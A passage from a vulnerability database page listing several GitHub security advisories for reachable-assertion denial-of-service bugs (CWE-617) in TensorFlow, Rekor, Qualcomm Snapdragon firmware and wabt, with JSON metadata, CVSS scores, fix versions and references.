"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23581"
},
{
"type": "WEB",
"url": "https://github.com/tensorflow/tensorflow/commit/1fb27733f943295d874417630edd3b38b34ce082"
},
{
"type": "WEB",
"url": "https://github.com/tensorflow/tensorflow/commit/240655511cd3e701155f944a972db71b6c0b1bb6"
},
{
"type": "WEB",
"url": "https://github.com/tensorflow/tensorflow/commit/ebc1a2ffe5a7573d905e99bd0ee3568ee07c12c1"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2022-90.yaml"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2022-145.yaml"
},
{
"type": "WEB",
"url": "https://github.com/tensorflow/tensorflow"
},
{
"type": "WEB",
"url": "https://github.com/tensorflow/tensorflow/blob/a1320ec1eac186da1d03f033109191f715b2b130/tensorflow/core/grappler/optimizers/constant_folding.cc#L1687-L1742"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "`CHECK`-failures during Grappler\u0027s `IsSimplifiableReshape` in Tensorflow"
}
GHSA-FRQX-JFCM-6JJR
Vulnerability from github – Published: 2023-05-26 19:39 – Updated: 2023-05-26 19:39Impact
A malformed proposed entry of the intoto/v0.0.2 type can cause a panic on a thread within the Rekor process. The thread is recovered so the client receives a 500 error message and service still continues, so the availability impact of this is minimal.
Patches
This is fixed in v1.2.0 of Rekor.
Workarounds
No
References
Discovered by OSS-Fuzz
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/sigstore/rekor"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.2.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-33199"
],
"database_specific": {
"cwe_ids": [
"CWE-617"
],
"github_reviewed": true,
"github_reviewed_at": "2023-05-26T19:39:03Z",
"nvd_published_at": "2023-05-26T23:15:18Z",
"severity": "MODERATE"
},
"details": "### Impact\nA malformed proposed entry of the `intoto/v0.0.2` type can cause a panic on a thread within the Rekor process. The thread is recovered so the client receives a 500 error message and service still continues, so the availability impact of this is minimal.\n\n### Patches\nThis is fixed in v1.2.0 of Rekor.\n\n### Workarounds\nNo\n\n### References\nDiscovered by OSS-Fuzz",
"id": "GHSA-frqx-jfcm-6jjr",
"modified": "2023-05-26T19:39:03Z",
"published": "2023-05-26T19:39:03Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/sigstore/rekor/security/advisories/GHSA-frqx-jfcm-6jjr"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33199"
},
{
"type": "WEB",
"url": "https://github.com/sigstore/rekor/commit/140c5add105179e5ffd9e3e114fd1b6b93aebbd4"
},
{
"type": "PACKAGE",
"url": "https://github.com/sigstore/rekor"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
],
"summary": "malformed proposed intoto entries can cause a panic"
}
GHSA-FRR5-J95H-H8Q2
Vulnerability from github – Published: 2022-01-14 00:02 – Updated: 2023-04-19 18:30Possible assertion due to improper validation of symbols configured for PDCCH monitoring in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile
{
"affected": [],
"aliases": [
"CVE-2021-30287"
],
"database_specific": {
"cwe_ids": [
"CWE-617"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-01-13T12:15:00Z",
"severity": "HIGH"
},
"details": "Possible assertion due to improper validation of symbols configured for PDCCH monitoring in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile",
"id": "GHSA-frr5-j95h-h8q2",
"modified": "2023-04-19T18:30:52Z",
"published": "2022-01-14T00:02:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-30287"
},
{
"type": "WEB",
"url": "https://www.qualcomm.com/company/product-security/bulletins/january-2022-bulletin"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-FRWP-9M3Q-PJC8
Vulnerability from github – Published: 2025-06-19 21:31 – Updated: 2025-06-19 21:31A vulnerability was found in WebAssembly wabt up to 1.0.37 and classified as problematic. This issue affects the function LogOpcode of the file src/binary-reader-objdump.cc. The manipulation leads to reachable assertion. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. The code maintainer explains that this issue might not affect "real world wasm programs".
{
"affected": [],
"aliases": [
"CVE-2025-6273"
],
"database_specific": {
"cwe_ids": [
"CWE-617"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-06-19T19:15:21Z",
"severity": "MODERATE"
},
"details": "A vulnerability was found in WebAssembly wabt up to 1.0.37 and classified as problematic. This issue affects the function LogOpcode of the file src/binary-reader-objdump.cc. The manipulation leads to reachable assertion. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. The code maintainer explains that this issue might not affect \"real world wasm programs\".",
"id": "GHSA-frwp-9m3q-pjc8",
"modified": "2025-06-19T21:31:19Z",
"published": "2025-06-19T21:31:19Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6273"
},
{
"type": "WEB",
"url": "https://github.com/WebAssembly/wabt/issues/2574"
},
{
"type": "WEB",
"url": "https://github.com/user-attachments/files/19529411/wabt_crash.txt"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.313277"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.313277"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.593010"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-FVC8-Q78J-C743
Vulnerability from github – Published: 2024-03-04 12:31 – Updated: 2024-03-04 12:31Transient DOS while processing multiple payload container type with incorrect container length received in DL NAS transport OTA in NR.
{
"affected": [],
"aliases": [
"CVE-2023-33095"
],
"database_specific": {
"cwe_ids": [
"CWE-617"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-03-04T11:15:10Z",
"severity": "HIGH"
},
"details": "Transient DOS while processing multiple payload container type with incorrect container length received in DL NAS transport OTA in NR.",
"id": "GHSA-fvc8-q78j-c743",
"modified": "2024-03-04T12:31:10Z",
"published": "2024-03-04T12:31:10Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33095"
},
{
"type": "WEB",
"url": "https://www.qualcomm.com/company/product-security/bulletins/march-2024-bulletin"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
Make sensitive open/close operation non reachable by directly user-controlled data (e.g. open/close resources)
Mitigation
Strategy: Input Validation
Perform input validation on user data.
No CAPEC attack patterns related to this CWE.